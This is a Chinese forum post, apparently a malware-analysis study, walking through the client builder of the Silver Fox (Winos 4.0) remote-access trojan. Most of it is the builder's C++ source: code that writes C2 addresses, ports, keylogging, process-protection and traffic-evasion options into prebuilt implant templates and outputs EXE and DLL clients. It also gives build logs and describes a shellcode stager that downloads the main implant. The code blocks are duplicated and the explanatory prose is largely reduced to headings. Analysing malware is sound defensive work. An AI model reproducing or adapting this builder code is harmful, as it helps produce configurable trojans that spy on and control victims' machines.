最近在学习木马分析,网上关于银狐的源码分析目前还没看到,挖个坑学一学银狐(winos 4.0)的源码。
客户生成/BuildDlg.cpp
是生成客户端的窗口类(CBuildDlg)的实现代码,是由下面几个函数实现客户端的生成:
生成过程由CBuildDlg::build
函数进行控制,被上面几个函数进行调用,此处为核心代码:
整体流程为:
其中获取配置信息的getsettingdata()
函数尤为重要,配置信息由客户端界面进行设置,部分为默认值:
生成客户端(exe)的日志如下:
其中 上线模块.bin -> output_64.exe
流程由 CBuildDlg::changedataandwritefile()
函数控制,具体流程为:
上述流程详细来说:
也就是说,.bin 文件实际上就是预先编译好的exe文件,最后进行:
生成客户端(dll)的日志为:
生成dll的核心函数为CBuildDlg::OnBnClickedBuilddll()
,具体流程为:
首先会询问是否加载DLL入口点的原因是这个dll可以使用两种执行方式:
DLL生成时需要额外处理导出函数,这里额外使用了一个标记 "zidingyixiugaidaochuhanshu":
生成过程中会将这个函数名替换到DLL模板中预设的"zidingyixiugaidaochuhanshu"标记位置。在代码中导出函数名是通过界面上的 m_edit_dll 变量控制的,其默认值为"run":
银狐的设计比较灵活,对比两种dll执行方式,各有优缺点:
DllMain执行:
导出函数执行:
生成Shellcode的主要流程在OnBnClickedBuildShellcode
和changeshellcodeandwritefile
这两个函数中。主要流程如下:
首先提示用户Shellcode的限制:
准备Shellcode的配置信息:
读取Shellcode模板文件:
组合Shellcode数据:
写出Shellcode文件:
其中Shellcode的数据结构为:
数据排列方式:
可以看到这里使用的是执行代码.dll而不是上线模块.dll,是因为执行代码.dll和上线模块.dll的用途和结构是不同的:
上线模块.dll:
执行代码.dll:
执行代码.dll的源码ShellCode_main.cpp
的实现核心为:
从执行代码.dll(shellcode)下载的payload是上线模块.dll/.bin:
最后Shellcode完整执行方式为:
powershell 目前很少用到,并且有一定限制,本文主要针对几种主要使用的客户端生成流程进行分析,如有问题欢迎指正。
void
OnBnClickedBuildexe()
void
OnBnClickedBuilddll()
void
OnBnClickedBuildShellcode()
void
OnBnClickedBuildPowershell()
void
OnBnClickedBuildexe()
void
OnBnClickedBuilddll()
void
OnBnClickedBuildShellcode()
void
OnBnClickedBuildPowershell()
BOOL
CBuildDlg::build(
int
mode)
{
UpdateData(TRUE);
CFileDialog dlg(FALSE, _T(
""
), _T(
"output"
), OFN_HIDEREADONLY | OFN_OVERWRITEPROMPT, _T(
"可执行文件(*.*)| All Files (*.*) |*.*||"
), NULL);
if
(dlg.DoModal() != IDOK)
{
m_edit_tip.SendMessage(EM_REPLACESEL, 0, (
LPARAM
)_T(
"已取消生成\r\n"
));
return
FALSE;
}
CString path;
if
(mode == 0)
{
if
(!getsettingdata())
{
m_edit_tip.SendMessage(EM_REPLACESEL, 0, (
LPARAM
)_T(
"初始化参数失败\r\n"
));
return
FALSE;
}
path = _T(
"\\Plugins\\x86\\上线模块.bin"
);
swprintf_s(writepath, _T(
"%s_86.exe"
), dlg.GetPathName());
if
(!changedataandwritefile(path))
{
m_edit_tip.SendMessage(EM_REPLACESEL, 0, (
LPARAM
)_T(
"x86 exe 生成失败\r\n"
));
return
FALSE;
}
path = _T(
"\\Plugins\\x64\\上线模块.bin"
);
swprintf_s(writepath, _T(
"%s_64.exe"
), dlg.GetPathName());
if
(!changedataandwritefile(path))
{
m_edit_tip.SendMessage(EM_REPLACESEL, 0, (
LPARAM
)_T(
"x64 exe 生成失败\r\n"
));
return
FALSE;
}
}
if
(mode == 1)
{
if
(MessageBox(_T(
"Dll加载运行DllMain吗?"
), _T(
"加载执行"
), MB_OKCANCEL) == IDOK)
{
MyInfo.otherset.RunDllEntryProc =
true
;
}
else
{
MyInfo.otherset.RunDllEntryProc =
false
;
}
if
(!getsettingdata())
{
m_edit_tip.SendMessage(EM_REPLACESEL, 0, (
LPARAM
)_T(
"初始化参数失败\r\n"
));
return
FALSE;
}
path = _T(
"\\Plugins\\x86\\上线模块.dll"
);
swprintf_s(writepath, _T(
"%s_86.dll"
), dlg.GetPathName());
if
(!changedataandwritefile(path, TRUE))
{
m_edit_tip.SendMessage(EM_REPLACESEL, 0, (
LPARAM
)_T(
"x86 dll 生成失败\r\n"
));
return
FALSE;
}
path = _T(
"\\Plugins\\x64\\上线模块.dll"
);
swprintf_s(writepath, _T(
"%s_64.dll"
), dlg.GetPathName());
if
(!changedataandwritefile(path, TRUE))
{
m_edit_tip.SendMessage(EM_REPLACESEL, 0, (
LPARAM
)_T(
"x64 exe 生成失败\r\n"
));
return
FALSE;
}
}
return
TRUE;
}
BOOL
CBuildDlg::build(
int
mode)
{
UpdateData(TRUE);
CFileDialog dlg(FALSE, _T(
""
), _T(
"output"
), OFN_HIDEREADONLY | OFN_OVERWRITEPROMPT, _T(
"可执行文件(*.*)| All Files (*.*) |*.*||"
), NULL);
if
(dlg.DoModal() != IDOK)
{
m_edit_tip.SendMessage(EM_REPLACESEL, 0, (
LPARAM
)_T(
"已取消生成\r\n"
));
return
FALSE;
}
CString path;
if
(mode == 0)
{
if
(!getsettingdata())
{
m_edit_tip.SendMessage(EM_REPLACESEL, 0, (
LPARAM
)_T(
"初始化参数失败\r\n"
));
return
FALSE;
}
path = _T(
"\\Plugins\\x86\\上线模块.bin"
);
swprintf_s(writepath, _T(
"%s_86.exe"
), dlg.GetPathName());
if
(!changedataandwritefile(path))
{
m_edit_tip.SendMessage(EM_REPLACESEL, 0, (
LPARAM
)_T(
"x86 exe 生成失败\r\n"
));
return
FALSE;
}
path = _T(
"\\Plugins\\x64\\上线模块.bin"
);
swprintf_s(writepath, _T(
"%s_64.exe"
), dlg.GetPathName());
if
(!changedataandwritefile(path))
{
m_edit_tip.SendMessage(EM_REPLACESEL, 0, (
LPARAM
)_T(
"x64 exe 生成失败\r\n"
));
return
FALSE;
}
}
if
(mode == 1)
{
if
(MessageBox(_T(
"Dll加载运行DllMain吗?"
), _T(
"加载执行"
), MB_OKCANCEL) == IDOK)
{
MyInfo.otherset.RunDllEntryProc =
true
;
}
else
{
MyInfo.otherset.RunDllEntryProc =
false
;
}
if
(!getsettingdata())
{
m_edit_tip.SendMessage(EM_REPLACESEL, 0, (
LPARAM
)_T(
"初始化参数失败\r\n"
));
return
FALSE;
}
path = _T(
"\\Plugins\\x86\\上线模块.dll"
);
swprintf_s(writepath, _T(
"%s_86.dll"
), dlg.GetPathName());
if
(!changedataandwritefile(path, TRUE))
{
m_edit_tip.SendMessage(EM_REPLACESEL, 0, (
LPARAM
)_T(
"x86 dll 生成失败\r\n"
));
return
FALSE;
}
path = _T(
"\\Plugins\\x64\\上线模块.dll"
);
swprintf_s(writepath, _T(
"%s_64.dll"
), dlg.GetPathName());
if
(!changedataandwritefile(path, TRUE))
{
m_edit_tip.SendMessage(EM_REPLACESEL, 0, (
LPARAM
)_T(
"x64 exe 生成失败\r\n"
));
return
FALSE;
}
}
return
TRUE;
}
BOOL
CBuildDlg::getsettingdata()
{
UpdateData(TRUE);
m_edit_tip.SendMessage(EM_REPLACESEL, 0, (
LPARAM
)_T(
"初始化参数\r\n"
));
_tcscpy_s(MyInfo.szAddress, m_edit_ip.GetBuffer(0));
_tcscpy_s(MyInfo.szPort, m_edit_port.GetBuffer(0));
MyInfo.IsTcp = h_combo_net.GetCurSel() ?
false
:
true
;
_tcscpy_s(MyInfo.szAddress2, m_edit_ip2.GetBuffer(0));
_tcscpy_s(MyInfo.szPort2, m_edit_port2.GetBuffer(0));
MyInfo.IsTcp2 = h_combo_net2.GetCurSel() ?
false
:
true
;
_tcscpy_s(MyInfo.szAddress3, m_edit_ip3.GetBuffer(0));
_tcscpy_s(MyInfo.szPort3, m_edit_port3.GetBuffer(0));
MyInfo.IsTcp3 = h_combo_net3.GetCurSel() ?
false
:
true
;
_tcscpy_s(MyInfo.szRunSleep, m_edit_first_time.GetBuffer(0));
_tcscpy_s(MyInfo.szHeart, m_edit_rest_time.GetBuffer(0));
_tcscpy_s(MyInfo.Remark, m_edit_v.GetBuffer(0));
_tcscpy_s(MyInfo.szGroup, m_edit_g.GetBuffer(0));
MyInfo.otherset.IsKeyboard = (((CButton*)GetDlgItem(IDC_CHECK_KEYBOARD))->GetCheck()) ?
true
:
false
;
MyInfo.otherset.antinet = (((CButton*)GetDlgItem(IDC_CHECK_NET))->GetCheck()) ?
true
:
false
;
MyInfo.otherset.Processdaemon = (((CButton*)GetDlgItem(IDC_CHECK_PROCESSDAEMON))->GetCheck()) ?
true
:
false
;
MyInfo.otherset.ProtectedProcess = (((CButton*)GetDlgItem(IDC_CHECK_PROTEXTEDPROCESS))->GetCheck()) ?
true
:
false
;
MyInfo.otherset.puppet = (((CButton*)GetDlgItem(IDC_CHECK_PUPPET))->GetCheck()) ?
true
:
false
;
CString s = confimodel;
Setfindinfo(s, _T(
"地址1"
), MyInfo.szAddress, NULL);
Setfindinfo(s, _T(
"端口1"
), MyInfo.szPort, NULL);
Setfindinfo(s, _T(
"通信1"
), NULL, MyInfo.IsTcp);
Setfindinfo(s, _T(
"地址2"
), MyInfo.szAddress2, NULL);
Setfindinfo(s, _T(
"端口2"
), MyInfo.szPort2, NULL);
Setfindinfo(s, _T(
"通信2"
), NULL, MyInfo.IsTcp2);
Setfindinfo(s, _T(
"地址3"
), MyInfo.szAddress3, NULL);
Setfindinfo(s, _T(
"端口3"
), MyInfo.szPort3, NULL);
Setfindinfo(s, _T(
"通信3"
), NULL, MyInfo.IsTcp3);
Setfindinfo(s, _T(
"等待"
), MyInfo.szRunSleep, NULL);
Setfindinfo(s, _T(
"重连"
), MyInfo.szHeart, NULL);
Setfindinfo(s, _T(
"分组"
), MyInfo.szGroup, NULL);
Setfindinfo(s, _T(
"版本"
), MyInfo.szVersion, NULL);
Setfindinfo(s, _T(
"备注"
), MyInfo.Remark, NULL);
Setfindinfo(s, _T(
"键盘"
), NULL, MyInfo.otherset.IsKeyboard);
Setfindinfo(s, _T(
"保护"
), NULL, MyInfo.otherset.ProtectedProcess);
Setfindinfo(s, _T(
"流量"
), NULL, MyInfo.otherset.antinet);
Setfindinfo(s, _T(
"入口"
), NULL, MyInfo.otherset.RunDllEntryProc);
Setfindinfo(s, _T(
"守护"
), NULL, MyInfo.otherset.Processdaemon);
Setfindinfo(s, _T(
"傀儡"
), NULL, MyInfo.otherset.puppet);
Setfindinfo(s, _T(
"特别"
), NULL, MyInfo.otherset.special);
s.MakeReverse();
ZeroMemory(confi, 1000 * 2);
memcpy
(confi, s.GetBuffer(), s.GetLength() * 2 + 2);
return
TRUE;
}
BOOL
CBuildDlg::getsettingdata()
{
UpdateData(TRUE);
m_edit_tip.SendMessage(EM_REPLACESEL, 0, (
LPARAM
)_T(
"初始化参数\r\n"
));
_tcscpy_s(MyInfo.szAddress, m_edit_ip.GetBuffer(0));
_tcscpy_s(MyInfo.szPort, m_edit_port.GetBuffer(0));
MyInfo.IsTcp = h_combo_net.GetCurSel() ?
false
:
true
;
_tcscpy_s(MyInfo.szAddress2, m_edit_ip2.GetBuffer(0));
_tcscpy_s(MyInfo.szPort2, m_edit_port2.GetBuffer(0));
MyInfo.IsTcp2 = h_combo_net2.GetCurSel() ?
false
:
true
;
_tcscpy_s(MyInfo.szAddress3, m_edit_ip3.GetBuffer(0));
_tcscpy_s(MyInfo.szPort3, m_edit_port3.GetBuffer(0));
MyInfo.IsTcp3 = h_combo_net3.GetCurSel() ?
false
:
true
;
_tcscpy_s(MyInfo.szRunSleep, m_edit_first_time.GetBuffer(0));
_tcscpy_s(MyInfo.szHeart, m_edit_rest_time.GetBuffer(0));
_tcscpy_s(MyInfo.Remark, m_edit_v.GetBuffer(0));
_tcscpy_s(MyInfo.szGroup, m_edit_g.GetBuffer(0));
MyInfo.otherset.IsKeyboard = (((CButton*)GetDlgItem(IDC_CHECK_KEYBOARD))->GetCheck()) ?
true
:
false
;
MyInfo.otherset.antinet = (((CButton*)GetDlgItem(IDC_CHECK_NET))->GetCheck()) ?
true
:
false
;
MyInfo.otherset.Processdaemon = (((CButton*)GetDlgItem(IDC_CHECK_PROCESSDAEMON))->GetCheck()) ?
true
:
false
;
MyInfo.otherset.ProtectedProcess = (((CButton*)GetDlgItem(IDC_CHECK_PROTEXTEDPROCESS))->GetCheck()) ?
true
:
false
;
MyInfo.otherset.puppet = (((CButton*)GetDlgItem(IDC_CHECK_PUPPET))->GetCheck()) ?
true
:
false
;
CString s = confimodel;
Setfindinfo(s, _T(
"地址1"
), MyInfo.szAddress, NULL);
Setfindinfo(s, _T(
"端口1"
), MyInfo.szPort, NULL);
Setfindinfo(s, _T(
"通信1"
), NULL, MyInfo.IsTcp);
Setfindinfo(s, _T(
"地址2"
), MyInfo.szAddress2, NULL);
Setfindinfo(s, _T(
"端口2"
), MyInfo.szPort2, NULL);
Setfindinfo(s, _T(
"通信2"
), NULL, MyInfo.IsTcp2);
Setfindinfo(s, _T(
"地址3"
), MyInfo.szAddress3, NULL);
Setfindinfo(s, _T(
"端口3"
), MyInfo.szPort3, NULL);
Setfindinfo(s, _T(
"通信3"
), NULL, MyInfo.IsTcp3);
Setfindinfo(s, _T(
"等待"
), MyInfo.szRunSleep, NULL);
Setfindinfo(s, _T(
"重连"
), MyInfo.szHeart, NULL);
Setfindinfo(s, _T(
"分组"
), MyInfo.szGroup, NULL);
Setfindinfo(s, _T(
"版本"
), MyInfo.szVersion, NULL);
Setfindinfo(s, _T(
"备注"
), MyInfo.Remark, NULL);
Setfindinfo(s, _T(
"键盘"
), NULL, MyInfo.otherset.IsKeyboard);
Setfindinfo(s, _T(
"保护"
), NULL, MyInfo.otherset.ProtectedProcess);
Setfindinfo(s, _T(
"流量"
), NULL, MyInfo.otherset.antinet);
Setfindinfo(s, _T(
"入口"
), NULL, MyInfo.otherset.RunDllEntryProc);
Setfindinfo(s, _T(
"守护"
), NULL, MyInfo.otherset.Processdaemon);
Setfindinfo(s, _T(
"傀儡"
), NULL, MyInfo.otherset.puppet);
Setfindinfo(s, _T(
"特别"
), NULL, MyInfo.otherset.special);
s.MakeReverse();
ZeroMemory(confi, 1000 * 2);
memcpy
(confi, s.GetBuffer(), s.GetLength() * 2 + 2);
return
TRUE;
}
开始生成.
初始化参数
读取文件C:\Users\root\Desktop\新建文件夹\Plugins\x86\上线模块.bin
修改配置信息
写出成功C:\Users\root\Desktop\新建文件夹\output_86.exe
读取文件C:\Users\root\Desktop\新建文件夹\Plugins\x64\上线模块.bin
修改配置信息
写出成功C:\Users\root\Desktop\新建文件夹\output_64.exe
生成成功
开始生成.
初始化参数
读取文件C:\Users\root\Desktop\新建文件夹\Plugins\x86\上线模块.bin
修改配置信息
写出成功C:\Users\root\Desktop\新建文件夹\output_86.exe
读取文件C:\Users\root\Desktop\新建文件夹\Plugins\x64\上线模块.bin
修改配置信息
写出成功C:\Users\root\Desktop\新建文件夹\output_64.exe
生成成功
BOOL
CBuildDlg::changedataandwritefile(CString path,
BOOL
bchangeexport)
{
TCHAR
DatPath[MAX_PATH] = { 0 };
GetModuleFileName(NULL, DatPath,
sizeof
(DatPath));
*_tcsrchr(DatPath, _T(
'\\'
)) =
'\0'
;
CString path_data;
path_data = DatPath;
path_data += path;
WIN32_FIND_DATA FindData;
HANDLE
hFile;
hFile = FindFirstFile(path_data, &FindData);
if
(hFile == INVALID_HANDLE_VALUE) { m_edit_tip.SendMessage(EM_REPLACESEL, 0, (
LPARAM
)_T(
"文件不存在"
)); m_edit_tip.SendMessage(EM_REPLACESEL, 0, (
LPARAM
)path_data.GetBuffer()); m_edit_tip.SendMessage(EM_REPLACESEL, 0, (
LPARAM
)_T(
"\r\n"
));
return
FALSE; }
FindClose(hFile);
m_edit_tip.SendMessage(EM_REPLACESEL, 0, (
LPARAM
)_T(
"读取文件"
)); m_edit_tip.SendMessage(EM_REPLACESEL, 0, (
LPARAM
)path_data.GetBuffer()); m_edit_tip.SendMessage(EM_REPLACESEL, 0, (
LPARAM
)_T(
"\r\n"
));
hFile = CreateFile(path_data, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
if
(hFile == INVALID_HANDLE_VALUE)
{
m_edit_tip.SendMessage(EM_REPLACESEL, 0, (
LPARAM
)_T(
"读取文件失败"
)); m_edit_tip.SendMessage(EM_REPLACESEL, 0, (
LPARAM
)path_data.GetBuffer()); m_edit_tip.SendMessage(EM_REPLACESEL, 0, (
LPARAM
)_T(
"\r\n"
));
return
FALSE;
}
DWORD
len = GetFileSize(hFile, NULL);
char
* str =
new
char
[len];
ZeroMemory(str,
sizeof
(str));
DWORD
wr = 0;
ReadFile(hFile, str, len, &wr, NULL);
CloseHandle(hFile);
m_edit_tip.SendMessage(EM_REPLACESEL, 0, (
LPARAM
)_T(
"修改配置信息\r\n"
));
DWORD
dwOffset = -1;
dwOffset = memfind(str, _T(
"xiugaishiyong"
), len, 0);
if
(dwOffset == -1)
{
m_edit_tip.SendMessage(EM_REPLACESEL, 0, (
LPARAM
)_T(
"找不到上线配置标记 \r\n"
));
m_edit_tip.SendMessage(EM_REPLACESEL, 0, (
LPARAM
)path_data.GetBuffer());
m_edit_tip.SendMessage(EM_REPLACESEL, 0, (
LPARAM
)_T(
"r\n"
));
SAFE_DELETE_AR(str);
return
FALSE;
}
DWORD
dwOffset_export = -1;
char
* exportnamebuf = NULL;
int
exportnamelen = 0;
if
(bchangeexport)
{
dwOffset_export = memfind(str,
"zidingyixiugaidaochuhanshu"
, len, 0);
exportnamelen = WideCharToMultiByte(CP_ACP, 0, m_edit_dll, -1, NULL, 0, NULL, NULL);
exportnamebuf =
new
char
[exportnamelen + 1];
WideCharToMultiByte(CP_ACP, 0, m_edit_dll, -1, exportnamebuf, exportnamelen, NULL, NULL);
if
((dwOffset_export == -1))
{
log_信息(
"找不到导出函数"
);
m_edit_tip.SendMessage(EM_REPLACESEL, 0, (
LPARAM
)_T(
"找不到导出函数zidingyixiugaidaochuhanshu标记\r\n"
));
m_edit_tip.SendMessage(EM_REPLACESEL, 0, (
LPARAM
)path_data.GetBuffer());
m_edit_tip.SendMessage(EM_REPLACESEL, 0, (
LPARAM
)_T(
"r\n"
));
SAFE_DELETE_AR(exportnamebuf);
SAFE_DELETE_AR(str);
return
FALSE;
}
}
CFile file;
if
(file.Open(writepath, CFile::modeCreate | CFile::modeWrite | CFile::modeRead | CFile::typeBinary))
{
if
(dwOffset != -1)
memcpy
(str + dwOffset, (
char
*)&confi, lstrlen(confi) * 2 + 1);
if
(bchangeexport)
memcpy
(str + dwOffset_export, (
char
*)exportnamebuf, exportnamelen);
file.Write(str, len);
file.Close();
m_edit_tip.SendMessage(EM_REPLACESEL, 0, (
LPARAM
)_T(
"写出成功"
)); m_edit_tip.SendMessage(EM_REPLACESEL, 0, (
LPARAM
)writepath); m_edit_tip.SendMessage(EM_REPLACESEL, 0, (
LPARAM
)_T(
"\r\n"
));
SAFE_DELETE_AR(str);
return
TRUE;
}
else
{
m_edit_tip.SendMessage(EM_REPLACESEL, 0, (
LPARAM
)_T(
"文件无法创建,查看是否占用\r\n"
));
m_edit_tip.SendMessage(EM_REPLACESEL, 0, (
LPARAM
)writepath);
m_edit_tip.SendMessage(EM_REPLACESEL, 0, (
LPARAM
)_T(
"r\n"
));
SAFE_DELETE_AR(str);
return
FALSE;
}
}
BOOL
CBuildDlg::changedataandwritefile(CString path,
BOOL
bchangeexport)
{
TCHAR
DatPath[MAX_PATH] = { 0 };
GetModuleFileName(NULL, DatPath,
sizeof
(DatPath));
*_tcsrchr(DatPath, _T(
'\\'
)) =
'\0'
;
CString path_data;
path_data = DatPath;
path_data += path;
WIN32_FIND_DATA FindData;
HANDLE
hFile;
hFile = FindFirstFile(path_data, &FindData);
if
(hFile == INVALID_HANDLE_VALUE) { m_edit_tip.SendMessage(EM_REPLACESEL, 0, (
LPARAM
)_T(
"文件不存在"
)); m_edit_tip.SendMessage(EM_REPLACESEL, 0, (
LPARAM
)path_data.GetBuffer()); m_edit_tip.SendMessage(EM_REPLACESEL, 0, (
LPARAM
)_T(
"\r\n"
));
return
FALSE; }
FindClose(hFile);
m_edit_tip.SendMessage(EM_REPLACESEL, 0, (
LPARAM
)_T(
"读取文件"
)); m_edit_tip.SendMessage(EM_REPLACESEL, 0, (
LPARAM
)path_data.GetBuffer()); m_edit_tip.SendMessage(EM_REPLACESEL, 0, (
LPARAM
)_T(
"\r\n"
));
hFile = CreateFile(path_data, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
if
(hFile == INVALID_HANDLE_VALUE)
{
m_edit_tip.SendMessage(EM_REPLACESEL, 0, (
LPARAM
)_T(
"读取文件失败"
)); m_edit_tip.SendMessage(EM_REPLACESEL, 0, (
LPARAM
)path_data.GetBuffer()); m_edit_tip.SendMessage(EM_REPLACESEL, 0, (
LPARAM
)_T(
"\r\n"
));
return
FALSE;
}
DWORD
len = GetFileSize(hFile, NULL);
char
* str =
new
char
[len];
ZeroMemory(str,
sizeof
(str));
DWORD
wr = 0;
ReadFile(hFile, str, len, &wr, NULL);
CloseHandle(hFile);
m_edit_tip.SendMessage(EM_REPLACESEL, 0, (
LPARAM
)_T(
"修改配置信息\r\n"
));
DWORD
dwOffset = -1;
dwOffset = memfind(str, _T(
"xiugaishiyong"
), len, 0);
if
(dwOffset == -1)
{
m_edit_tip.SendMessage(EM_REPLACESEL, 0, (
LPARAM
)_T(
"找不到上线配置标记 \r\n"
));
m_edit_tip.SendMessage(EM_REPLACESEL, 0, (
LPARAM
)path_data.GetBuffer());
m_edit_tip.SendMessage(EM_REPLACESEL, 0, (
LPARAM
)_T(
"r\n"
));
SAFE_DELETE_AR(str);
return
FALSE;
}
DWORD
dwOffset_export = -1;
char
* exportnamebuf = NULL;
int
exportnamelen = 0;
if
(bchangeexport)
{
dwOffset_export = memfind(str,
"zidingyixiugaidaochuhanshu"
, len, 0);
exportnamelen = WideCharToMultiByte(CP_ACP, 0, m_edit_dll, -1, NULL, 0, NULL, NULL);
exportnamebuf =
new
char
[exportnamelen + 1];
WideCharToMultiByte(CP_ACP, 0, m_edit_dll, -1, exportnamebuf, exportnamelen, NULL, NULL);
if
((dwOffset_export == -1))
{
log_信息(
"找不到导出函数"
);
m_edit_tip.SendMessage(EM_REPLACESEL, 0, (
LPARAM
)_T(
"找不到导出函数zidingyixiugaidaochuhanshu标记\r\n"
));
m_edit_tip.SendMessage(EM_REPLACESEL, 0, (
LPARAM
)path_data.GetBuffer());
m_edit_tip.SendMessage(EM_REPLACESEL, 0, (
LPARAM
)_T(
"r\n"
));
SAFE_DELETE_AR(exportnamebuf);
SAFE_DELETE_AR(str);
return
FALSE;
}
}
CFile file;
if
(file.Open(writepath, CFile::modeCreate | CFile::modeWrite | CFile::modeRead | CFile::typeBinary))
{
if
(dwOffset != -1)
memcpy
(str + dwOffset, (
char
*)&confi, lstrlen(confi) * 2 + 1);
if
(bchangeexport)
memcpy
(str + dwOffset_export, (
char
*)exportnamebuf, exportnamelen);
file.Write(str, len);
file.Close();
m_edit_tip.SendMessage(EM_REPLACESEL, 0, (
LPARAM
)_T(
"写出成功"
)); m_edit_tip.SendMessage(EM_REPLACESEL, 0, (
LPARAM
)writepath); m_edit_tip.SendMessage(EM_REPLACESEL, 0, (
LPARAM
)_T(
"\r\n"
));
SAFE_DELETE_AR(str);
return
TRUE;
[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)
最后于 2024-11-22 10:54
被bwner编辑
,原因: